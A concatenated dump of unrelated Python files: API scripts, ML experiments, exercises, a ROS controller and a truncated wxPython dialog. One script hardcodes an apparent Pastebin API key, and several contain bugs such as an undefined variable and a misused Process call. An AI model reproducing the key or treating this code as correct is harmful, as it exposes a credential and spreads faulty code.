\n \n '''\n\n return html_string","sub_path":"report/nonfarm_payroll.py","file_name":"nonfarm_payroll.py","file_ext":"py","file_size_in_byte":3926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"48367019","text":"import json\nimport requests\nimport datetime\nimport pprint\nfrom Pastebin import PastebinAPI\n\nPASTEKEY = '4d150744923e05e1eb047ec0f613fe28'\n\n\ndef command_runner(msg, PASTEKEY):\n x = PastebinAPI()\n data = 'data'\n user = msg[1]\n games = []\n runtimes = []\n runplaces = []\n runcats = []\n rungames = []\n runstrlist = [['Game', 'Category', 'Place', 'Time']]\n i = 1\n runner = requests.get('http://www.speedrun.com/api/v1/users?name=%s' % user)\n rjs = json.loads(runner.text)\n try:\n rjs['data']\n except:\n print('No runner found with that name.')\n return(None)\n id = rjs[data][0]['id']\n name = rjs[data][0]['names']['international']\n pbs = requests.get('http://www.speedrun.com/api/v1/users/%s/personal-bests?embed=game,category' % id)\n pbjs = json.loads(pbs.text)\n runs = pbjs[data]\n for run in runs:\n gamename = run['game']['data']['names']['international']\n if gamename not in games:\n games.append(gamename)\n gamestr = ', '.join(games[:5])\n fullgamestr = ', '.join(games)\n for run in runs:\n run['game']['data']['names']['international'] = run['game']['data']['names']['international'].lower()\n time = run['run']['times']['primary_t']\n runtime = str(datetime.timedelta(seconds=time))\n runtimes.append(runtime)\n runplaces.append(str(run['place']))\n runcats.append(run['category']['data']['name'])\n rungames.append(run['game']['data']['names']['international'])\n i = i+1\n print(runstr)\nmsg = ['!runner', 'stinkycheeseone890', '']\ncommand_runner(msg, PASTEKEY)\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"519531817","text":"import pika\nfrom flask import Flask\n\nfrom facade import queue_name\nfrom multiprocessing import Process, Manager\nglobal total_str1\ntotal_str1 = list()\napp = Flask(__name__)\n\n\ndef consume(final_list):\n connection = pika.BlockingConnection(pika.ConnectionParameters('localhost'))\n channel = connection.channel()\n channel.queue_declare(queue=queue_name)\n def callback_(ch, method, properties, body):\n print(\" [x] Received {}\".format(body))\n final_list.append(str(body))\n channel.basic_consume(queue=queue_name, on_message_callback=callback_, auto_ack=True)\n channel.start_consuming()\n\n@app.route('/', methods=['GET'])\ndef message_f():\n\n print(\" \".join(total_str1))\n return \" \".join(total_str1)\n\n\nif __name__ == \"__main__\":\n\n \n manager = Manager()\n final_list = manager.list()\n p1 = Process(target=consume, args=(final_list,))\n p1.start()\n \n total_str1 = final_list\n p2 =Process( app.run(port=5010))\n p2.start()\n\n\n","sub_path":"lab6/message1.py","file_name":"message1.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"96539095","text":"# !/usr/bin/env python\n# coding:utf-8\n# Author: Caojian\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimg = plt.imread('./a.jpg')\nimg_tinted = img * [1, 0, 0] #rgb\nplt.subplot(1, 2, 1) #1行2列的第一个\nplt.imshow(img)\nplt.subplot(1, 2, 2) 
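# panel 2 of the 1-row, 2-column figure 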
#1行2列的第二个\nplt.imshow(img_tinted)\nplt.show()\n","sub_path":"人工智能/python3/源码/p44_matplotlib.py","file_name":"p44_matplotlib.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"371454777","text":"# to_do_list = [\"0\" for _ in range(10)]\n# command = input()\n# while not command == \"End\":\n# data = command.split(\"-\")\n# importance = int(data[0])\n# action = data[1]\n# to_do_list.remove(\"0\")\n# to_do_list.insert(importance, action)\n# command = input()\n# result = [el for el in to_do_list if el != \"0\"]\n# print(result)\n\n############################### РЕШЕНИЕ ЙОРДАН ДЖАМБАЗОВ от предишния fund ##########################################################\n\ntasks = []\n\nwhile True:\n command = input()\n if command == \"End\":\n break\n tokens = command.split(\"-\")\n priority = int(tokens[0])\n task = tokens[1]\n tasks.append((priority, task))\n\n\ntasks_in_priority = [task_name for priority, task_name in sorted(tasks)]\nprint(tasks_in_priority)","sub_path":"python_fundamentals_september 2020/05. lists_advanced/01. lab/02. todo_list.py","file_name":"02. todo_list.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"316874859","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport pickle\nimport networkx as nx\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport random\nimport sys\nfrom IPython.display import clear_output\nimport os\nfrom math import floor\n\n# In[2]:\n\n\nwith open('output_data/utils.p', 'rb') as f :\n utils = pickle.load(f)\nG70 = utils['G70']\nG100 = utils['G100']\nINVTHRESHOLDINT = utils['INVTHRESHOLDINT']\ndef isInv(inv):\n return inv > INVTHRESHOLDINT\ndef isVent(v):\n return 0 < v < INVTHRESHOLDINT\nventures = [v for v in G70.nodes() if v INVTHRESHOLDINT]\n\nventures100 = [v for v in G70.nodes() if v INVTHRESHOLDINT]\n\n\n# In[3]:\n\n\ndef isCandidate(G70, v, i) :\n if isVent(i) or isInv(v):\n print(\"Not in good order\")\n return (i not in G70[v]) and (v not in G70[i])\n\ndef isTarget(G70, G100, v, i):\n if isVent(i) or isInv(v):\n print(\"Not in good order\")\n return isCandidate(G70,v,i) and G100.has_edge(v,i) or G100.has_edge(i,v)\n\ndef predict(G, v, i, THRESHOLD, SCORETYPE, existing_edges_, verify=False) :\n if verify and (v,i) in existing_edges_:\n print(\"not candidate\")\n return;\n if SCORETYPE=='random' :\n return random.random() > THRESHOLD\n \n if SCORETYPE == 'pref' :\n return G70.degree(v)*G70.degree(i) > THRESHOLD*51910\n \ndef fast_predict_pref(G, v, i, THRESHOLD) : \n return G70.degree(v)*G70.degree(i) > THRESHOLD*51910\n \ndef put_inv_on_right(set_of_links):\n S = set()\n r = 0\n n=0\n for v,i in set_of_links:\n if v > INVTHRESHOLDINT:\n S.add((i,v))\n r+=1\n else :\n S.add((v,i))\n n+=1\n return S\n\nexisting_edges = set(put_inv_on_right(G70.edges()))\nexisting_edges_100 = set(put_inv_on_right(G100.edges()))\ntarget_edges = existing_edges_100 - existing_edges\n\n\n# In[4]:\n\n\nfrom time import time\ndef print_BLABLA(data) :\n with open('output_data/utils.p', 'rb') as f :\n utils = pickle.load(f)\n\n def print_TPFPTNFN(utils_, ventures, THRESHOLD, printing=False, fore_string = \"\"):\n TP = 0\n FP = 0\n FN = 0\n TN = 0\n G100 = utils_['G100']\n G70 = utils_['G70']\n INVTHRESHOLDINT = utils_['INVTHRESHOLDINT']\n investors = [i for i in G70.nodes() if i> INVTHRESHOLDINT]\n existing_edges = set(put_inv_on_right(G70.edges()))\n 
existing_edges_100 = set(put_inv_on_right(G100.edges()))\n target_edges = existing_edges_100 - existing_edges\n del G100, existing_edges_100\n Nv = len(ventures)\n IT = 0\n for v in ventures :\n for i in investors :\n if (v,i) not in existing_edges :\n if fast_predict_pref(G70, v, i, THRESHOLD) :\n if (v,i) in target_edges:\n TP +=1\n else :\n FP +=1\n else:\n if (v,i) in target_edges:\n FN +=1\n else :\n TN +=1\n\n recall = 0 if not(TP+FN) else TP / (TP + FN)\n precision = 0 if not(TP+FP) else TP / (TP + FP)\n F1 = 0 if not(precision+recall) else 2*(precision*recall)/(precision+recall)\n return TP, FP, TN, FN, recall, precision, F1\n \n return print_TPFPTNFN(utils, data['ventures'], data['THRESHOLD'], printing=not(data['pid']), fore_string= data['pid'])\n\n\n\n\n# In[ ]:\n\n\nfrom multiprocessing import Pool\n\n\nK=int(sys.argv[1])\nTHRESHOLDS = [0.02, 0.04, 0.06,0.08, 0.1, 0.2] #[0.0001, 0.0002,0.0003,0.0004,0.0006,0.0008,0.0010, 0.002,0.003,0.006,0.01]\n\n\nprint(\"Running with cores : \" , K)\nresults=[]\nfor THRESHOLD in THRESHOLDS:\n t0 = time()\n ventures_split = [{'ventures':ventures[i::K], 'pid':i, 'THRESHOLD':THRESHOLD} for i in range(K)]\n print(\"Running for Threshold :\", THRESHOLD)\n if __name__ == '__main__':\n p = Pool(K)\n results.append(p.map(print_BLABLA, ventures_split))\n print(time()-t0, \"secondes\")\n pickle.dump(results[-1], open(\"output_results/results{0}.p\".format(THRESHOLD), \"wb\"))\n","sub_path":"optimized_computation/predx2.py","file_name":"predx2.py","file_ext":"py","file_size_in_byte":4208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"67333083","text":"# insert ../ directory\n# import os\n# import sys\n# _ = os.path.abspath(os.path.abspath(__file__) + '/../../')\n# if _ not in sys.path:\n# sys.path.insert(0, _)\nfrom mxnet import nd\n\n\ndef bn_checker(BNs):\n params = []\n for bn in BNs:\n params.append(bn.params.get('running_mean').data().copy())\n \n def compare():\n nparams = []\n diff = 0.\n print('p, b {} {}'.format(params[0][0], BNs[0].params.get('running_mean').data()[0]))\n for param, bn in zip(params, BNs):\n nparam = bn.params.get('running_mean').data()\n diff += nd.sum(nd.abs(nparam - param)).asscalar()\n return diff\n return compare\n\n\nclass BNControl(object):\n \"\"\"\n only support renet18 by me now.\n \"\"\"\n @staticmethod\n def collect_BN(blocks):\n BN = []\n for blk in blocks:\n _type = str(blk).split('(')[0]\n if _type == 'BatchNorm':\n BN.append(blk)\n elif _type == 'Residual':\n BN.extend([blk.bn1, blk.bn2])\n return BN\n \n def __init__(self, blocks, use_batch=True):\n self.bns = BNControl.collect_BN(blocks)\n self.use_batch = use_batch\n self.data_list = []\n \n def store(self):\n if self.use_batch: # use batch data and no change running mean/std\n if len(self.data_list) == 0:\n for i, bn in enumerate(self.bns):\n self.data_list.append(bn.params.get('running_mean').data().copy())\n self.data_list.append(bn.params.get('running_var').data().copy())\n else:\n for i, bn in enumerate(self.bns):\n self.data_list[2*i][:] = bn.params.get('running_mean').data()\n self.data_list[2*i+1][:] = bn.params.get('running_var').data()\n else: # no use batch data and no change running mean/std\n for i, bn in enumerate(self.bns):\n self.data_list.append(bn._kwargs['use_global_stats'])\n bn._kwargs['use_global_stats'] = True\n \n def load(self):\n if self.use_batch:\n for i in range(len(self.bns)):\n bn, mean, std = self.bns[i], self.data_list[2*i], self.data_list[2*i+1]\n 
bn.params.get('running_mean').set_data(mean)\n bn.params.get('running_var').set_data(std)\n else:\n for i in range(len(self.bns)):\n bn, data = self.bns[i], self.data_list[i]\n bn._kwargs['use_global_stats'] = data\n\n\nclass ResNetBNControl(BNControl):\n \"\"\"\n test on Resnet18_v1 and Resnet50_v1\n \"\"\"\n def collect_BN(self, blocks):\n BN = []\n for blk in blocks:\n _type = str(blk).split('(')[0]\n if _type == 'BatchNorm':\n BN.append(blk)\n elif _type == 'Residual':\n BN.extend([blk.bn1, blk.bn2])\n elif _type == 'HybridSequential' or _type == 'Sequential':\n BN.extend(self.collect_BN(blk))\n elif _type in ['BasicBlockV1', 'BottleneckV1']:\n BN.extend(self.collect_BN(blk.body))\n if hasattr(blk, 'downsample') and blk.downsample is not None:\n BN.extend(self.collect_BN(blk.downsample))\n return BN\n \n def __init__(self, blocks, use_batch=True):\n if isinstance(blocks, list):\n self.bns = []\n for block in blocks:\n self.bns.extend(self.collect_BN(block))\n else:\n self.bns = self.collect_BN(blocks)\n self.use_batch = use_batch\n self.data_list = []","sub_path":"build/lib/MPUtils/umxnet/backgrad/BNControl.py","file_name":"BNControl.py","file_ext":"py","file_size_in_byte":3619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"421977636","text":"import numpy as np\n\nfrom keras.datasets import cifar10\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense, Dropout, Activation\nfrom keras.optimizers import RMSprop\nfrom keras.utils import np_utils\n\n# function to read in and process the cifar-10 data\ndef load_data():\n (X_train, y_train), (X_test, y_test) = cifar10.load_data()\n X_train = X_train.reshape(50000, 3072)\n X_test = X_test.reshape(10000, 3072)\n X_train = X_train.astype('float32')\n X_test = X_test.astype('float32')\n X_train /= 255\n X_test /= 255\n # take only first 3 classes\n X_train = X_train[(y_train < 3).reshape(50000)]\n y_train = y_train[(y_train < 3).reshape(50000)]\n X_test = X_test[(y_test < 3).reshape(10000)]\n y_test = y_test[(y_test < 3).reshape(10000)]\n # convert class vectors to binary class matrices\n Y_train = np_utils.to_categorical(y_train, 3)\n Y_test = np_utils.to_categorical(y_test, 3)\n return X_train, Y_train, X_test, Y_test\n\n# copy the first nlayers of model 'model' and freeze\n# them. Note that these are layers in the keras sense,\n# that is, it counts a drop-out layer or activation layer\n# as an actual layer\ndef copy_freeze_model(model, nlayers = 1):\n new_model = Sequential()\n for l in model.layers[:nlayers]:\n l.trainable = False\n new_model.add(l)\n return new_model\n\n# read in the dataset\n(X_train, Y_train, X_test, Y_test) = load_data()\n\n\n\n# 4. 
Autoencoder layers\nmodel = Sequential()\nfor i in range(4):\n hdn = 32 * pow(4, i)\n model.add(Dense(hdn, input_shape=(3072,)))\n model.add(Activation('relu'))\n model.add(Dropout(0.2))\n\n model.add(Dense(3072))\n # model.add(Activation('softmax'))\n\n rms = RMSprop()\n model.compile(loss='mse', optimizer=rms)\n # model.fit(X_train, Y_train, batch_size=32, nb_epoch=1, verbose=1,\n # show_accuracy=True, validation_split=0.2)\n # print('Autoencoder r: %d\\nClassifcation rate %02.3f\\n\\n' % (\n # hdn, model.evaluate(X_test, Y_test, show_accuracy=True)[1]))\n model.fit(X_train, X_train, batch_size=32, nb_epoch=25, verbose=1,\n show_accuracy=True, validation_split=0.2)\n\n # pre - x_train)**2\n\n print('Autoencoder r: %d\\nClassifcation rate %02.3f\\n\\n' % (\n hdn, model.evaluate(X_test, X_test, show_accuracy=True)[1]))","sub_path":"ws362_pset06/pset0604.py","file_name":"pset0604.py","file_ext":"py","file_size_in_byte":2306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"224776732","text":"class Solution(object):\n def findLadders(self, beginWord, endWord, wordList):\n \"\"\"\n :type beginWord: str\n :type endWord: str\n :type wordList: List[str]\n :rtype: List[List[str]]\n \"\"\"\n\n from collections import defaultdict\n wordmap = defaultdict(list) # wordmap = {'lo*': ['lot', 'log'], ...}\n for word in wordList:\n for i,c in enumerate(word):\n key = word[:i] + '*' + word[i+1:]\n wordmap[key].append(word)\n\n\n def bfs(start, end, dic, wordmap, distance):\n from collections import deque\n queue = deque([start])\n distance[start] = 0\n while queue:\n curr = queue.popleft()\n currdist = distance[curr]\n for i,c in enumerate(curr):\n key = curr[:i] + \"*\" + curr[i+1:]\n for next in wordmap[key]:\n if next not in distance:\n distance[next] = 1 + currdist\n queue.append(next)\n else:\n distance[next] = min(distance[next], 1 + currdist)\n\n\n def dfs(start, end, dic, wordmap, distance, solution, result):\n solution.append(start)\n if end == start:\n result.append(solution[:])\n else:\n for i,c in enumerate(start):\n key = start[:i] + \"*\" + start[i+1:]\n for next in wordmap[key]:\n if distance[next] == distance[start] +1:\n dfs(next, end, dic, wordmap, distance, solution, result)\n\n solution.pop()\n\n def helper(start, end, wordmap, distance, solution, result, dic):\n dic.add(start)\n bfs(start, end, dic, wordmap, distance)\n dfs(start, end, dic, wordmap, distance, solution, result)\n return solution\n\n\n dic = set()\n distance = {}\n solution = []\n result = []\n helper(beginWord, endWord, wordmap, distance, solution, result, dic)\n return result\n\n\nbeginWord = \"a\"\nendWord = \"c\"\nwordList = [\"a\",\"b\",\"c\"]\n\nbeginWord = \"hit\"\nendWord = \"cog\"\nwordList = [\"hot\",\"dot\",\"dog\",\"lot\",\"log\",\"cog\"]\n\nS = Solution()\nprint(S.findLadders(beginWord, endWord, wordList))\n","sub_path":"datastructures_algorithms/Graph/Graph-WordLadder-II.py","file_name":"Graph-WordLadder-II.py","file_ext":"py","file_size_in_byte":2356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"548720013","text":"# Define a procedure, fibonacci, that takes a natural number as its input, and\r\n# returns the value of that fibonacci number.\r\n\r\n# Two Base Cases:\r\n# fibonacci(0) => 0\r\n# fibonacci(1) => 1\r\n\r\n# Recursive Case:\r\n# n > 1 : fibonacci(n) => fibonacci(n-1) + fibonacci(n-2)\r\n\r\ndef fibonacci(n):\r\n\tif n == 0:\r\n\t\treturn n\r\n\tif n == 1:\r\n\t\treturn n\r\n\treturn 
fibonacci(n-1) + fibonacci(n-2)\r\n\r\n\r\ndef fibfor(n):\r\n\tcurrent = 0\r\n\tafter = 1\r\n\tfor i in range(0,n):\r\n\t\tcurrent, after = after, current + after\r\n\treturn current\r\n\r\ndef fibcount(n):\r\n\tfiblst = []\r\n\ts = []\r\n\tfor i in range(0,n):\r\n\t\tfiblst.append([fibfor(i),i-1])\r\n\tfor t in range(0,n):\r\n\t\ts.append(fiblst[i][0])\r\n\tprint(fiblst)\r\n\t# print(sum(fiblst))\r\n\r\nfibcount(10)\r\nfibcount(11)\r\nfibcount(12)\r\nfibcount(13)\r\nfibcount(14)\r\nfibcount(15)\r\n\r\n\r\n# print(fibfor(0), \" vs \", fibonacci(0))\r\n# print(fibfor(5), \" vs \", fibonacci(5))\r\n# print(fibfor(15), \" vs \", fibonacci(15))\r\n\r\n\r\n#print fibonacci(0)\r\n#>>> 0\r\n#print fibonacci(1)\r\n#>>> 1\r\n# print (fibonacci(15))\r\n#>>> 610","sub_path":"Python Udacity/fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"350327961","text":"# There is only 9,1 are neon numbers between 1 to n\nA = int(input(\"Enter a num to check a neon or not\"))\nX = A**2\narr = []\nfor i in str(X):\n arr.append(i)\nsum = 0\nfor j in arr:\n sum = sum + int(j)\nprint(sum)\nif sum == A:\n print(f\"{A} is a neon num\")\nelse:\n print(f\"{A} is not a neon num\")","sub_path":"python_basics_01.py/Neon_num.py","file_name":"Neon_num.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"465629455","text":"#!/usr/bin/env python\n\nimport rospy\nimport tf\nimport math\nfrom nav_msgs.msg import Odometry\nfrom geometry_msgs.msg import Twist\nfrom sensor_msgs.msg import LaserScan\nfrom geometry_msgs.msg import Vector3\nfrom std_msgs.msg import UInt32\n\n# max range is the artificial value used as the maximum range of the laser scanner\nmaxRange = 3.0\n\n# determines if the robot can see the goal directly\ngoalVisible = 0\n\n# threshold that determines if a point in the laser scan is a discontinuity\ndiscThresh = 3.0\n\nscan = LaserScan()\n\ndef scanUpdate(lScan):\n\tglobal scan\n\tscan = lScan\n\ndef tangentbug():\n\tglobal goalVisible\n\tglobal scan\n\tgoalfromlaser = rospy.Publisher('robot_2/robot2goal',Twist,queue_size=10)\n\trobotController = rospy.Publisher('robot_2/cmd_vel',Twist,queue_size=10)\n\n\tlistener = tf.TransformListener()\n\trate = rospy.Rate(1.0)\n\twhile not rospy.is_shutdown():\n\t\ttry:\n\t\t\t# trans is a list of 3 elements x,y,z of the transform. rot is a list of\n\t\t\t# 4 elements of the quaternion for the transform\n\t\t\t(trans,rot) = listener.lookupTransform('robot2/trueOdom','robot2/goal',rospy.Time(0))\n\t\t\ttwi = Twist()\n\t\t\ttwi.linear.x = trans[0]\n\t\t\ttwi.linear.y = trans[1]\n\t\t\ttwi.linear.z = trans[2]\n\t\t\t#ignore angular orientations since we only care about getting to the goal position\n\t\t\ttwi.angular = Vector3(0.0,0.0,0.0)\n\t\t\t\n\t\t\tcontrol = Twist()\n\t\t\tcontrol.linear = Vector3(0.0,0.0,0.0)\n\t\t\tcontrol.angular = Vector3(0.0,0.0,0.0)\n\t\t\tangle2goal = math.atan2(trans[1],trans[0])\n\n\t\t\tsensorIndex = int((angle2goal-scan.angle_min)/scan.angle_increment)\n\n\t\t\t# check if we can see the goal directly. 
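A clear line of sight shows up as the ray toward the goal reading the artificial max range. 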
Move towards it if we can\n\t\t\tif (scan.ranges[sensorIndex] >= maxRange):\n\t\t\t\tgoalVisible = 1\n\t\t\t\tif (angle2goal > 0):\n\t\t\t\t\tcontrol.linear.x = 0.3\n\t\t\t\t\tcontrol.angular.z = 0.2\n\t\t\t\telif (angle2goal < 0):\n\t\t\t\t\tcontrol.linear.x = 0.3\n\t\t\t\t\tcontrol.angular.z = -0.2\n\t\t\t\telse:\n\t\t\t\t\tcontrol.linear.x = 0.3\n\t\t\t\t\tcontrol.angular.z = 0.0\n\t\t\telse:\n\t\t\t\tgoalVisible = 0\n\n\t\t\t# if we can't see the goal directly, check for the best direction of travel\n\t\t\tif goalVisible == 0:\n\t\t\t\tbestAngle = 0.0\n\t\t\t\tbesti = 0\n\t\t\t\tbestDist = 10000.0\n\t\t\t\trealAngle = 0.0\n\n\t\t\t\tfor i in range(len(scan.ranges)):\n\t\t\t\t\t# check for discontinuties within a specified threshold\n\t\t\t\t\tif (i>0) and (abs(scan.ranges[i]-scan.ranges[i-1]) > discThresh):\n\t\t\t\t\t\t# output the index for the discontinuity and the angle value and the distance to that discontinuity\n\t\t\t\t\t\tdiscDist = scan.ranges[i]\n\t\t\t\t\t\tif discDist==float('Inf'):\n\t\t\t\t\t\t\tdiscDist = scan.range_max\n\t\t\t\t\t\tdAng = scan.angle_min + i * scan.angle_increment\n\t\t\t\t\t\txDist = discDist * math.sin(dAng)\n\t\t\t\t\t\tyDist = discDist * math.cos(dAng)\n\t\t\t\t\t\theurDist = math.sqrt((twi.linear.x-xDist) ** 2 + (twi.linear.y-yDist) ** 2)\n\t\t\t\t\t\tif ((heurDist + discDist) < bestDist):\n\t\t\t\t\t\t\tbestDist = heurDist + discDist\n\t\t\t\t\t\t\tbestAngle = dAng\n\t\t\t\t\t\t\tbesti = i\n\n\t\t\t\t# drive towards the best heuristic or turn towards it if we're not facing it already\n\t\t\t\tif ((bestAngle) > 0):\n\t\t\t\t\tcontrol.linear.x = 0.2\n\t\t\t\t\tcontrol.angular.z = 0.3\n\t\t\t\telif ((bestAngle) < 0):\n\t\t\t\t\tcontrol.linear.x = 0.2\n\t\t\t\t\tcontrol.angular.z = -0.3\n\t\t\t\telse:\n\t\t\t\t\tcontrol.linear.x = 0.2\n\t\t\t\t\tcontrol.angular.z = 0.0\n\n\t\t\t\t# prioritize avoiding obstacles\n\t\t\t\tif (besti > 90) and (besti < (len(scan.ranges)-90)):\n\t\t\t\t\tif scan.ranges[besti+20] < 2.0:\n\t\t\t\t\t\tcontrol.linear.x = 0.2\n\t\t\t\t\t\tcontrol.angular.z = 0.5\n\t\t\t\t\telif scan.ranges[besti-20] < 2.0:\n\t\t\t\t\t\tcontrol.linear.x = 0.2\n\t\t\t\t\t\tcontrol.angular.z = -0.5\n\t\t\t\telif (besti > 90) and (besti < (len(scan.ranges)-90)):\n\t\t\t\t\tif scan.ranges[besti+30] < 2.0:\n\t\t\t\t\t\tcontrol.linear.x = 0.2\n\t\t\t\t\t\tcontrol.angular.z = 0.5\n\t\t\t\t\telif scan.ranges[besti-30] < 2.0:\n\t\t\t\t\t\tcontrol.linear.x = 0.2\n\t\t\t\t\t\tcontrol.angular.z = -0.5\n\n\t\t\t# if obstacles are too close to the robot, prioritize avoiding them\n\t\t\tj = int(len(scan.ranges)/2) - 70\n\t\t\tm = int(len(scan.ranges)/2) - 10\n\t\t\tk = int(len(scan.ranges)/2) + 70\n\t\t\tn = int(len(scan.ranges)/2) + 10\n\n\t\t\tfor i in range(j,m):\n\t\t\t\tif (scan.ranges[i] < 2.5):\n\t\t\t\t\tcontrol.linear.x = 0.0\n\t\t\t\t\tcontrol.angular.z = 0.5\n\t\t\tfor i in range(n,k):\n\t\t\t\tif (scan.ranges[i] < 2.5):\n\t\t\t\t\tcontrol.linear.x = 0.0\n\t\t\t\t\tcontrol.angular.z = -0.5\n\n\t\t\t# stop moving if we're close enough to the goal\n\t\t\tif math.sqrt((twi.linear.x) ** 2 + (twi.linear.y) ** 2) < 0.5:\n\t\t\t\tcontrol.linear.x = 0.0\n\t\t\t\tcontrol.linear.y = 0.0\n\t\t\t\t\n\t\t\trobotController.publish(control)\n\t\t\tgoalfromlaser.publish(twi)\n\t\texcept (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):\n\t\t\tcontinue\n\n\trate.sleep()\n\nif __name__ == '__main__':\n try:\n \trospy.sleep(2.0)\n \trospy.init_node('tf_robot2_tbug')\n \trospy.Subscriber(\"robot_2/base_scan\",LaserScan,scanUpdate)\n 
\ttangentbug()\n \trospy.spin()\n except rospy.ROSInterruptException: pass","sub_path":"src/tangentbug2.py","file_name":"tangentbug2.py","file_ext":"py","file_size_in_byte":4738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"394502104","text":"\"\"\"\nDescription: \nRequirements: pySerial, wxPython Phoenix\n\nglossary and of other descriptions:\n\nDMM - digital multimeter\nPSU - power supply\nSBC - single board computer\n\nINS - general instrument commands\n\nGEN - general sequence instructions\n\n\"\"\"\n\nimport wx\nimport theme\nimport base\n# from wx.lib.agw import spinctrl\n\n\nclass StringCompare(wx.Dialog):\n\n def __init__(self, parent, variables):\n \n wx.Dialog.__init__(self,\n parent,\n title=\"String Compare\")\n \n self.operations = [\"+\",\"-\",\"*\",\"/\",\"^\",\"(\",\")\"]\n self._variables = variables\n \n panel = wx.Panel(self) \n sizer = wx.BoxSizer(wx.VERTICAL)\n \n hsizer = wx.BoxSizer(wx.HORIZONTAL)\n sbox = wx.StaticBox(panel, label=\"\") \n sbox_sizer = wx.StaticBoxSizer(sbox, wx.HORIZONTAL)\n grid = wx.GridBagSizer(5,5)\n \n row = 0\n lbl_var1 = wx.StaticText(panel, label=\"variables:\")\n grid.Add(lbl_var1, pos=(row,0), flag=wx.ALL|wx.EXPAND, border=2)\n \n choices = variables[\"locals\"]\n for var in variables[\"globals\"]:\n if var in choices:\n continue\n choices.append(var) \n choices = sorted(choices)\n \n cbox_vars1 = wx.ComboBox(panel, choices=choices, name=\"var1\", style=wx.CB_READONLY) \n cbox_vars1.Bind(wx.EVT_COMBOBOX, self.OnVarSelected) \n grid.Add(cbox_vars1, pos=(row,1), flag=wx.ALL|wx.EXPAND, border=2) \n \n row += 1\n lbl_var1 = wx.StaticText(panel, label=\"var1 = \")\n self.text_var1 = wx.TextCtrl(panel, value=\"\")\n self.text_var1.Bind(wx.EVT_TEXT, self.OnVarTextChange)\n grid.Add(lbl_var1, pos=(row,0), flag=wx.ALL|wx.ALIGN_RIGHT|wx.ALIGN_CENTRE, border=2)\n grid.Add(self.text_var1, pos=(row,1), span=(0,1), flag=wx.ALL|wx.EXPAND, border=2)\n \n row += 1 \n self.chk_literal = wx.CheckBox(panel, label=\"Is literal?\")\n self.chk_literal.SetValue(0)\n grid.Add(self.chk_literal, pos=(row,1), flag=wx.ALL|wx.EXPAND, border=2)\n \n sbox_sizer.Add(grid, 1, wx.ALL|wx.EXPAND, 0)\n \n #-----\n \n sbox = wx.StaticBox(panel, label=\"\") \n sbox_sizer2 = wx.StaticBoxSizer(sbox, wx.HORIZONTAL)\n grid2 = wx.GridBagSizer(5,5)\n \n row = 0\n lbl_var2 = wx.StaticText(panel, label=\"variables:\")\n grid2.Add(lbl_var2, pos=(row,0), flag=wx.ALL|wx.EXPAND, border=2)\n \n cbox_vars2 = wx.ComboBox(panel, choices=choices, name=\"var2\", style=wx.CB_READONLY) \n cbox_vars2.Bind(wx.EVT_COMBOBOX, self.OnVarSelected) \n grid2.Add(cbox_vars2, pos=(row,1), flag=wx.ALL|wx.EXPAND, border=2)\n \n row += 1\n lbl_var2 = wx.StaticText(panel, label=\"var2 = \")\n self.text_var2 = wx.TextCtrl(panel, value=\"\")\n self.text_var2.Bind(wx.EVT_TEXT, self.OnVarTextChange)\n grid2.Add(lbl_var2, pos=(row,0), flag=wx.ALL|wx.ALIGN_RIGHT|wx.ALIGN_CENTRE, border=2)\n grid2.Add(self.text_var2, pos=(row,1), span=(0,1), flag=wx.ALL|wx.EXPAND, border=2)\n \n row += 1 \n self.chk_literal2 = wx.CheckBox(panel, label=\"Is literal?\")\n self.chk_literal2.SetValue(1)\n grid2.Add(self.chk_literal2, pos=(row,1), flag=wx.ALL|wx.EXPAND, border=2)\n \n sbox_sizer2.Add(grid2, 1, wx.ALL|wx.EXPAND, 0)\n \n hsizer.Add(sbox_sizer, 1, wx.ALL|wx.EXPAND, 0)\n hsizer.Add(sbox_sizer2, 1, wx.ALL|wx.EXPAND, 0)\n \n # -----\n sbox = wx.StaticBox(panel, label=\"Pass/Fail\") \n sbox_sizer3 = wx.StaticBoxSizer(sbox, wx.HORIZONTAL)\n grid3 = wx.GridBagSizer(5,5)\n \n 
